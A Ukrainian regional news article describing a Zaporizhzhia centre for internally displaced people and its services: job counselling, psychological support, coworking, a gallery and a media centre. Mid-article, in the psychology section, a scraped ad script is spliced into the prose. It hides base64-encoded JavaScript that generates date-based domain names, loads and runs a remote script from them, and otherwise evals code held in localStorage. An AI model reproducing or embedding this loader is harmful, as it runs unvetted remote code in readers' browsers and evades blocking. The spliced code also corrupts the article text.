Виклики війни для жителів Запоріжжя і ВПО: чим можуть допомогти кожному безкоштовно

Запоріжжя з початком повномасштабної війни стало місцем порятунку для десятків тисяч українців, які змушені були тікати від російської агресії, у тому числі побували під окупацією. Ця обставина ставить перед громадою нові виклики та завдання: переселенцям треба допомогти адаптуватися у новому місті та облаштувати тут своє життя.

“Громадський центр для ВПО” на базі Запорізького обласного центру молоді був створений саме з цією метою. Оскільки підтримка ВПО – це комплексна задача, яка потребує багато зусиль у дуже різних напрямках, “Громадський центр для ВПО” опановує цілу низку діяльностей.

“Акцент” їх упорядкував, що даний текст можна було використовувати як “інструкцію” для ВПО на різних етапах життя у новому місті. Для цього ми поспілкувалися з представником центру Максимом Сухановим.

“Одразу ж зауважу, що наш центр хоч і має в назві ВПО, але простір та всі послуги доступні для всіх охочих. На додаток, ми хочемо бути тим місцем, де між ВПО та запоріжцями буде створюватися взаємозв’язок” — зазначив Максим.

Кар’єрний центр: працевлаштування

За даними соціологічного дослідження компанії Active Group станом на листопад 2022 року, 47,9% переселенців зіштовхуються з проблемою працевлаштування у новому середовищі. Саме відповідь на цей виклик “Громадський центр для ВПО” зробив одним з головних своїх завдань.

Для цього було розроблена ціла мережа активностей: курси, консультації групові та персональні та тренінги. Важливою складовою цього процесу є власне участь представників бізнесу, які розповідають про власні методи адаптації до воєнного часу.

“Наприклад, ми можемо розшукати вузькопрофільного експерта, який би міг допомогти у конкретному випадку. Можемо як домовитися про допомогу, так і оплатити її. Ми дуже хочемо, аби бізнес, який зруйнувала війна, зміг би почати нову сторінку у Запоріжжі” — пояснив нам Максим Суханов.

Як зазначає у публікації Forbes, війна значно знизила кількість вакансій на ринку праці. Станом на грудень вона складала лише 26,5% від довоєнного часу. Саме тому у “Громадському центрі для ВПО” громадянам допомагають скласти якісне резюме, аби мати більші шанси на працевлаштування. Кожен відвідувач центра має змогу проконсультуватися з фахівцями центру: юристом, бухгалтером і фінансистом.

Особливу увагу центр зосередив на підтримці підприємництва, адже у перспективі це створення нових робочих місць для громадян. Охочі відкрити власну справу можуть з перших вуст почути про те, як долати складнощі на цьому шляху. Наприклад, на початку березня центр проводить курс для підприємців “Бізнес.NOW”. Серед запрошених спікерів присутні підприємці, які вже мають успішний досвід створення або відновлення бізнесу під час війни.

Психологічна підтримка

Саме психологічний стан українців впливає на життя кожного у ці складні часи, тому не слід нехтувати спілкування з кваліфікованим психологом у разі відчуття потреби. За останніми даними опитувань Ради міжнародних наукових досліджень та обмінів, аж 40% ВПО відчувають симптоми депресії.

Дуже важливо вчасно допомогти людині, яка зіткнулася з горем, аби її стан не погіршився. Це усвідомлюють і у “Громадському центрі для ВПО”. На базі центру проводять групові та індивідуальні консультації з психологом, який, поміж усього, також проводить власні тренінги.

“Наш психолог, Андрій Ластовляк, проводить заняття з тілесно-орієнтованої терапії та розпочав заняття з групою тілесної релаксації «Театр тіла». Опинившись у дискомфортних ситуаціях учасники спостерігають та відтворюють свої реакції й разом із психологом переживають це так, щоб краще розуміти себе” — розповідає Максим Суханов про цей вид допомоги. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Які локації доступні громадянам при відвідуванні “Громадського центра для ВПО”

Коворкінг

За даними опитування Центра Разумкова, відключення електроенергії “сильно або “досить сильно” впливають на повсякдення життя 44% громадян. “Громадський центр для ВПО” також намагається допомогти тим, хто відчуває складнощі у зв’язку з цим. Для цього була створена наймасштабніша локація центру — коворкінг, на заходах в якому можуть бути до 100 осіб. Крім цього, на базі центру є кухня, на якій можна зробити каву або розігріти їжу.

Облаштування приміщення вже на завершальному етапі. Вже скоро сюди можна прийти у години відключень і попрацювати.

“Нашим відвідувачам у таких ситуаціях ми намагаємося надати усе необхідне. У нас є техніка та безперебійний доступ в інтернет. Ми можемо надати людини, наприклад ноутбук, щоб попрацювати. Для забезпечення електрики у складні години на базі центру є генератор” — розповідає нам Максим Суханов.

Галерея

Це приміщення для рефлексії, відпочинку та комунікації суспільства у шоковій ситуації. Організатори “Громадського центра для ВПО” вважають, що мистецтво важливе для подолання ментальних наслідків та створення спільного культурного. Тому на базі галереї постійно планують нові виставки з різними форматами — від VR до фотовиставок.

І це досить принагідно: 49% опитуваних Українського культурного фонду кажуть, що потребують допомоги у створенні умов для творчої практики та реалізації.

“Також у галереї проходять лекції від митців. Ми вважаємо, що це також допомагає адаптуватися до сьогодення або відпочити” — каже Максим.

Медіацентр

Це не тільки приміщення “Громадського центра”, а й можливість поновити журналістку діяльність переміщеним або малим медіа, які потребують зручних умов для праці. Наприклад, тут можна провести ефір або записати інтерв’ю. Також це буде у пригоді громадським організаціям та благодійним фондам для проведення пресконференцій, щодо своєї діяльності.

“Запоріжжя все ще знаходиться занадто близько до лінії фронту. Для того, щоб міжнародні партнери розуміли, що у нас тут відбувається та не припиняли підтримку, потрібно постійно підтримувати з ними звʼязок. Тому важливою складовою роботи медіацентру є створення зручних умов для міжнародних ЗМІ. Завдяки цьому кожен охочий може розповісти свою історію на весь світ” – розповідає Максим Суханов. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/vikliki-vijni-dlya-zhiteliv-zaporizhzhya-i-vpo-chim-mozhut-dopomogti-kozhnomu-bezkoshtovno/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top